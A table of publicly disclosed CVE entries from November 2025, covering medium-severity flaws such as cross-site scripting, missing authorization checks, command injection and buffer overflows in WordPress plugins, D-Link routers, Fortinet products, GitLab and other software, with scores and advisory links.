| codepeople--Appointment Booking Calendar | The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.96. This is due to the plugin exposing an unauthenticated booking processing endpoint (cpabc_appointments_check_IPN_verification) that trusts attacker-supplied payment notifications without verifying their origin, authenticity, or requiring proper authorization checks. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and insert them into the live calendar via the 'cpabc_ipncheck' parameter, triggering administrative and customer notification emails and disrupting operations. | 2025-11-22 | 5.3 | CVE-2025-13317 | https://www.wordfence.com/threat-intel/vulnerabilities/id/638217c4-7a37-49e4-8660-5510ace692ec?source=cve https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L14 https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L363 https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L476 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399113%40appointment-booking-calendar&new=3399113%40appointment-booking-calendar&sfp_email=&sfph_mail=   |
| codepeople--Booking Calendar Contact Form | The Booking Calendar Contact Form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.60. This is due to missing authorization checks and payment verification in the `dex_bccf_check_IPN_verification` function. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and bypass payment requirements via the 'dex_bccf_ipn' parameter. | 2025-11-22 | 5.3 | CVE-2025-13318 | https://www.wordfence.com/threat-intel/vulnerabilities/id/83b0ae2c-6b08-4b71-a728-c60722ec20c7?source=cve https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/tags/1.2.59/dex_bccf.php#L1409 https://plugins.trac.wordpress.org/browser/booking-calendar-contact-form/trunk/dex_bccf.php#L1409 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399906%40booking-calendar-contact-form&new=3399906%40booking-calendar-contact-form&sfp_email=&sfph_mail=   |
| codeyatri--Gutenify Visual Site Builder Blocks & Site Templates. | The Gutenify - Visual Site Builder Blocks & Site Templates. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's block attributes in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-8605 | https://www.wordfence.com/threat-intel/vulnerabilities/id/853b86ca-0231-4b1c-b1d2-b8c23dbdc3c5?source=cve https://wordpress.org/plugins/gutenify/#developers   |
| coffeebite--Padlet Shortcode | The Padlet Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'key' parameter in the 'wallwisher' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12660 | https://www.wordfence.com/threat-intel/vulnerabilities/id/09989141-43ba-446c-8230-0485add7a1e2?source=cve https://wordpress.org/plugins/wallwisher-shortcode/ https://plugins.trac.wordpress.org/browser/wallwisher-shortcode/tags/1.3/wallwisher.php#L22   |
| cozmoslabs--User Profile Builder Beautiful User Registration Forms, User Profiles & User Role Editor | The User Profile Builder - Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wppb-embed shortcode in all versions up to, and including, 3.14.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-13054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3830ae19-cafc-40db-afde-2424cae23031?source=cve https://plugins.trac.wordpress.org/changeset/3397155/profile-builder   |
| cyberlord92--WP Login and Register using JWT | The WP Login and Register using JWT plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'mo_jwt_generate_new_api_key' function in all versions up to, and including, 3.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to generate a new API key on site's that do not have an API key configured and subsequently use that to access restricted endpoints. | 2025-11-19 | 4.3 | CVE-2025-12822 | https://www.wordfence.com/threat-intel/vulnerabilities/id/966523a4-3d4b-444b-b9d0-63c72527a99f?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397900%40login-register-using-jwt&new=3397900%40login-register-using-jwt&sfp_email=&sfph_mail=   |
| D-Link--DWR-M920 | A security vulnerability has been detected in D-Link DWR-M920, DWR-M921, DIR-822K and DIR-825M 1.1.5. Impacted is the function system of the file /boafrm/formDebugDiagnosticRun. The manipulation of the argument host leads to command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 6.3 | CVE-2025-13306 | VDB-332646 | D-Link DWR-M920/DWR-M921/DIR-822K/DIR-825M formDebugDiagnosticRun system command injection VDB-332646 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691813 | D-Link DWR-M920 V1.1.5 Command Injection Submit #693805 | D-Link DIR-822k TK_1.00_20250513164613 Command Injection (Duplicate) Submit #693807 | D-Link DWR-M921 V1.1.50 Command Injection (Duplicate) Submit #695426 | D-Link DIR-825m v1.1.12 Command Injection (Duplicate) https://github.com/LX-LX88/cve/issues/15 https://www.dlink.com/   |
| darto--Islamic Phrases | The Islamic Phrases plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phrases' shortcode attribute in all versions up to, and including, 2.12.2015. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11768 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e9bcc72-e434-4f6f-9e90-eec8cad31035?source=cve https://plugins.trac.wordpress.org/browser/islamic-phrases/tags/2.12.2015/islamic-phrases.php#L89   |
| davidangel--AudioTube | The AudioTube plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' shortcode attribute of the 'audiotube' shortcode in all versions up to, and including, 0.0.3. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11801 | https://www.wordfence.com/threat-intel/vulnerabilities/id/258a2d5d-a176-4b89-bc4c-089d072982dd?source=cve https://plugins.trac.wordpress.org/browser/audiotube/tags/0.0.3/index.php#L64   |
| denishua--Top Friends | The Top Friends plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3. This is due to missing nonce validation on the top_friends_options_subpanel() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-12827 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8165196d-0117-473f-8ccf-57ffd3e08e16?source=cve https://plugins.trac.wordpress.org/browser/top-friends/tags/0.3/top-friends.php#L155   |
| DependencyTrack--frontend | @dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6. | 2025-11-17 | 4.8 | CVE-2025-64758 | https://github.com/DependencyTrack/frontend/security/advisories/GHSA-7xvh-c266-cfr5 https://github.com/DependencyTrack/frontend/pull/1378 https://github.com/DependencyTrack/frontend/pull/986 https://github.com/DependencyTrack/frontend/commit/8fd757be612eaf4f35eadbe4c334204d7bd711be   |
| developdaly--Stock Tools | The Stock Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'image_height' and 'image_width' shortcode attributes in all versions up to, and including, 1.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11765 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1d852dba-39ea-4cc9-9fcf-7f2ac3e1b5d0?source=cve https://plugins.trac.wordpress.org/browser/stock-tools/tags/1.1/stock-tools.php#L67   |
| devitemsllc--HT Mega Absolute Addons For Elementor | The HT Mega - Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Gutenberg blocks in all versions up to, and including, 3.0.0 due to insufficient input validation on user-supplied HTML tag names. This is due to the lack of a tag name whitelist allowing dangerous tags like 'script', 'iframe', and 'object' to be injected even though tag_escape() is used for sanitization. While some blocks use esc_html() for content, this can be bypassed using JavaScript encoding techniques (unquoted strings, backticks, String.fromCharCode()). This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-13141 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8bf04325-e313-4a68-89a0-b560bdef5a14?source=cve https://plugins.trac.wordpress.org/changeset/3398480/   |
| devsmip--BigBuy Dropshipping Connector for WooCommerce | The BigBuy Dropshipping Connector for WooCommerce plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 2.0.5 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to retrieve the output of phpinfo(). | 2025-11-21 | 5.3 | CVE-2025-12039 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19a3d5a5-4673-41e7-9868-99699852f330?source=cve https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L225 https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L260   |
| dfactory--Responsive Lightbox & Gallery | The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.3 via the 'get_image_size_by_url' function. This is due to insufficient validation of user-supplied URLs when determining image dimensions for gallery items. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services. | 2025-11-19 | 5.4 | CVE-2025-12359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f4c0bd6-f289-4a52-ac11-345076c32d84?source=cve https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-frontend.php#L1531 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-fast-image.php#L25 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/functions.php#L108 https://plugins.trac.wordpress.org/browser/responsive-lightbox/tags/2.5.3/includes/class-galleries.php#L3648 https://research.cleantalk.org/cve-2025-12359 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397940%40responsive-lightbox%2Ftrunk&old=3358021%40responsive-lightbox%2Ftrunk&sfp_email=&sfph_mail=   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext database account credentials from the system frontend. | 2025-11-17 | 4.9 | CVE-2025-13163 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has an Insufficiently Protected Credentials vulnerability, allowing privileged remote attackers to obtain plaintext credentials of AD and system mail from the system frontend. | 2025-11-17 | 4.9 | CVE-2025-13164 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Dreampie--Resty | A security vulnerability has been detected in Dreampie Resty up to 1.3.1.SNAPSHOT. This affects the function Request of the file /resty-httpclient/src/main/java/cn/dreampie/client/HttpClient.java of the component HttpClient Module. Such manipulation of the argument filename leads to path traversal. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 5.6 | CVE-2025-13435 | VDB-332979 | Dreampie Resty HttpClient HttpClient.java request path traversal VDB-332979 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #687603 | Dreampie Resty Framework - HttpClient Module 1.3.1.SNAPSHOT Path Traversal / Directory Traversal (CWE-22) https://github.com/Xzzz111/exps/blob/main/archives/Resty-PathTraversal-01/cve_application.md   |
| Dromara--dataCompare | A flaw has been found in Dromara dataCompare up to 1.0.1. The affected element is the function DbConfig of the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java of the component JDBC URL Handler. Executing manipulation can lead to injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-11-17 | 6.3 | CVE-2025-13268 | VDB-332603 | Dromara dataCompare JDBC URL DbconfigServiceImpl.java DbConfig injection VDB-332603 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689460 | dromara dataCompare 1.0.1 Improper Input Validation https://github.com/dromara/dataCompare/issues/13   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_remove_agent' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the role and capabilities of any user with an Administrator, WSDesk Supervisor, or WSDesk Agents role. | 2025-11-21 | 5.3 | CVE-2025-10054 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07c92f79-94ac-4153-9ab2-9608601508b0?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php#L77 https://plugins.trac.wordpress.org/changeset/3399391/   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.2.9 via the 'eh_crm_ticket_single_view_client' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of all support tickets. | 2025-11-21 | 4.3 | CVE-2025-10039 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9ffc0af-9c3d-4f8e-ae0b-e51c0c67dfe1?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions.php#L259 https://plugins.trac.wordpress.org/changeset/3391342/   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_settings_restore_trash' AJAX endpoint in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to restore all deleted tickets. | 2025-11-21 | 4.3 | CVE-2025-12022 | https://www.wordfence.com/threat-intel/vulnerabilities/id/982b23c5-2414-48f7-a2f5-96fef54f8d69?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-archive-ajax-functions.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the eh_crm_restore_data() function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to restore tickets. | 2025-11-21 | 4.3 | CVE-2025-12023 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4599b145-cb89-48d4-8581-e1ee7a7bd323?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eh_crm_settings_empty_trash' function in all versions up to, and including, 3.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to empty the ticket trash. | 2025-11-21 | 4.3 | CVE-2025-12085 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89696d1c-8e6e-402a-9d7a-03fe0f364a72?source=cve https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-two.php   |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_eh_crm_settings_empty_scheduled_actions' AJAX Action in all versions up to, and including, 3.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the scheduled triggers option. | 2025-11-21 | 4.3 | CVE-2025-12169 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae2ac493-e6df-4083-8601-65635ad342b2?source=cve https://plugins.trac.wordpress.org/changeset/3391816   |
| elextensions--WSChat WordPress Live Chat | The WSChat - WordPress Live Chat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'reset_settings' AJAX endpoint in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings. | 2025-11-19 | 4.3 | CVE-2025-12751 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0be6658d-aec8-404c-a994-bde10a3cdbac?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395773%40wschat-live-chat&new=3395773%40wschat-live-chat&sfp_email=&sfph_mail=   |
| esm-dev--esm.sh | esm.sh is a nobuild content delivery network(CDN) for modern web development. Prior to version 136, The esm.sh CDN service contains a Template Literal Injection vulnerability (CWE-94) in its CSS-to-JavaScript module conversion feature. When a CSS file is requested with the ?module query parameter, esm.sh converts it to a JavaScript module by embedding the CSS content directly into a template literal without proper sanitization. An attacker can inject malicious JavaScript code using ${...} expressions within CSS files, which will execute when the module is imported by victim applications. This enables Cross-Site Scripting (XSS) in browsers and Remote Code Execution (RCE) in Electron applications. This issue has been patched in version 136. | 2025-11-19 | 6.1 | CVE-2025-65026 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-hcpf-qv9m-vfgp https://github.com/esm-dev/esm.sh/commit/87d2f6497574bf4448641a5527a3ac2beba5fd6c   |
| etruel--WP Delete Post Copies | The WP Delete Post Copies plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-11-21 | 4.4 | CVE-2025-12066 | https://www.wordfence.com/threat-intel/vulnerabilities/id/92ab1f56-5ca6-48e8-b380-ac2e302d63d2?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394571%40etruel-del-post-copies&new=3394571%40etruel-del-post-copies&sfp_email=&sfph_mail=   |
| everviz--everviz Charts, Maps and Tables Interactive and responsive | The everviz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `everviz` shortcode attributes in versions up to, and including, 1.1. This is due to the plugin not properly sanitizing user input or escaping output when building a `<div id=...>` from the `type` and `hash` attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-11868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3b265d9-dddd-4cf7-8d1a-980fdd17777d?source=cve https://plugins.trac.wordpress.org/browser/everviz/tags/1.0/highcharts-editor.php#L136   |
| f1logic--WP Twitter Auto Publish | The WP Twitter Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12079 | https://www.wordfence.com/threat-intel/vulnerabilities/id/562456ac-a113-4b3d-bc5d-6dedde635d5e?source=cve https://wordpress.org/plugins/twitter-auto-publish/   |
| Facebook--WhatsApp Business for iOS | Incomplete validation of rich response messages in WhatsApp for iOS prior to v2.25.23.73, WhatsApp Business for iOS v2.25.23.82, and WhatsApp for Mac v2.25.23.83 could have allowed a user to trigger processing of media content from an arbitrary URL on another user's device. We have not seen evidence of exploitation in the wild. | 2025-11-18 | 5.4 | CVE-2025-55179 | https://www.facebook.com/security/advisories/cve-2025-55179 https://www.whatsapp.com/security/advisories/2025/   |
| farvehandleren--Custom Post Type | The Custom Post Type plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the custom post type deletion functionality. This makes it possible for unauthenticated attackers to delete custom post types via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 4.3 | CVE-2025-13142 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48fefbd5-d872-4f47-8696-d73fbc9133ed?source=cve https://plugins.trac.wordpress.org/browser/custom-post-type/tags/1.0/cupta-dmin.php#L29   |
| fastmover--Shortcodes Bootstrap | The Shortcodes Bootstrap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' parameter in the [notification] shortcode in all versions up to, and including, 1.1. This is due to missing input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11764 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9363db7-4535-427d-a6ae-2580f215b965?source=cve https://plugins.trac.wordpress.org/browser/shortcodes-bootstrap/trunk/inc/dws_alert.php#L16   |
| Fortinet--FortiADC | An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests. | 2025-11-18 | 6.3 | CVE-2025-48839 | https://fortiguard.fortinet.com/psirt/FG-IR-25-225   |
| Fortinet--FortiADC | A improper neutralization of script-related html tags in a web page (basic xss) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions, FortiADC 7.2 all versions may allow attacker to execute unauthorized code or commands via crafted URL. | 2025-11-19 | 4.2 | CVE-2025-58412 | https://fortiguard.fortinet.com/psirt/FG-IR-25-736   |
| Fortinet--FortiClientWindows | An active debug code vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.10, FortiClientWindows 7.0 all versions may allow a local attacker to run the application step by step and retrieve the saved VPN user password | 2025-11-18 | 4.9 | CVE-2025-54660 | https://fortiguard.fortinet.com/psirt/FG-IR-25-844   |
| Fortinet--FortiExtender | A buffer copy without checking size of input ('classic buffer overflow') in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands. | 2025-11-18 | 6.3 | CVE-2025-46776 | https://fortiguard.fortinet.com/psirt/FG-IR-25-251   |
| Fortinet--FortiExtender | A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands. | 2025-11-18 | 5.2 | CVE-2025-46775 | https://fortiguard.fortinet.com/psirt/FG-IR-25-259   |
| Fortinet--FortiOS | A stack-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions allows attacker to execute unauthorized code or commands via specially crafted packets | 2025-11-18 | 6.9 | CVE-2025-53843 | https://fortiguard.fortinet.com/psirt/FG-IR-25-358   |
| Fortinet--FortiSandbox | An Improper Isolation or Compartmentalization vulnerability [CWE-653] in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an unauthenticated attacker to evade the sandboxing scan via a crafted file. | 2025-11-18 | 5 | CVE-2025-46215 | https://fortiguard.fortinet.com/psirt/FG-IR-24-501   |
| Fortinet--FortiSASE | A stack-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions, FortiSASE 25.3.b allows attacker to execute unauthorized code or commands via specially crafted packets | 2025-11-18 | 6.9 | CVE-2025-58413 | https://fortiguard.fortinet.com/psirt/FG-IR-25-632   |
| Fortinet--FortiWeb | An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands. | 2025-11-18 | 6.7 | CVE-2025-58034 | https://fortiguard.fortinet.com/psirt/FG-IR-25-513   |
| Fortinet--FortiWeb | A use of hard-coded credentials vulnerability in Fortinet FortiWeb 7.6.0, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow an authenticated attacker with shell access to the device to connect to redis service and access its data | 2025-11-18 | 4.8 | CVE-2025-59669 | https://fortiguard.fortinet.com/psirt/FG-IR-25-843   |
| fpcorso--Tips Shortcode | The Tips Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tip' shortcode in all versions up to, and including, 0.2.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11767 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34c13495-23c3-4b07-9bfb-678723daa43f?source=cve https://plugins.trac.wordpress.org/browser/tips-shortcode/tags/0.2.1/tips_shortcode.php#L33   |
| Gallagher--HBUS Devices | Observable Timing Discrepancy (CWE-208) in HBUS devices may allow an attacker with physical access to the device to extract device-specific keys, potentially compromising further site security. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)), all versions of 9.00 and prior. | 2025-11-18 | 5.7 | CVE-2025-52457 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-52457   |
| Gallagher--High Sec End of Line Module | Incorrect Usage of Seeds in Pseudo-Random Number Generator (CWE- 335) vulnerability in the High Sec ELM may allow a sophisticated attacker with physical access, to compromise internal device communications. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)), all versions of 9.00 and prior. | 2025-11-18 | 5.7 | CVE-2025-52578 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-52578   |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.7 to 18.2.8, 18.3 before 18.3.4, and 18.4 before 18.4.2 that could have allowed authenticated users without project membership to view sensitive manual CI/CD variables by querying the GraphQL API. | 2025-11-21 | 5 | CVE-2025-9825 | https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/ GitLab Issue #567301 HackerOne Bug Bounty Report #3319800   |
| gn_themes--WP Shortcodes Plugin Shortcodes Ultimate | The WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.4.5 via the su_shortcode_csv_table function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. If the 'Unsafe features' option is explicitly enabled by an administrator, this issue becomes exploitable by Contributor+ attackers | 2025-11-23 | 6.4 | CVE-2025-12800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbb7db4-bef7-4799-9b65-ebe77976e21c?source=cve https://plugins.trac.wordpress.org/changeset/3397946/   |
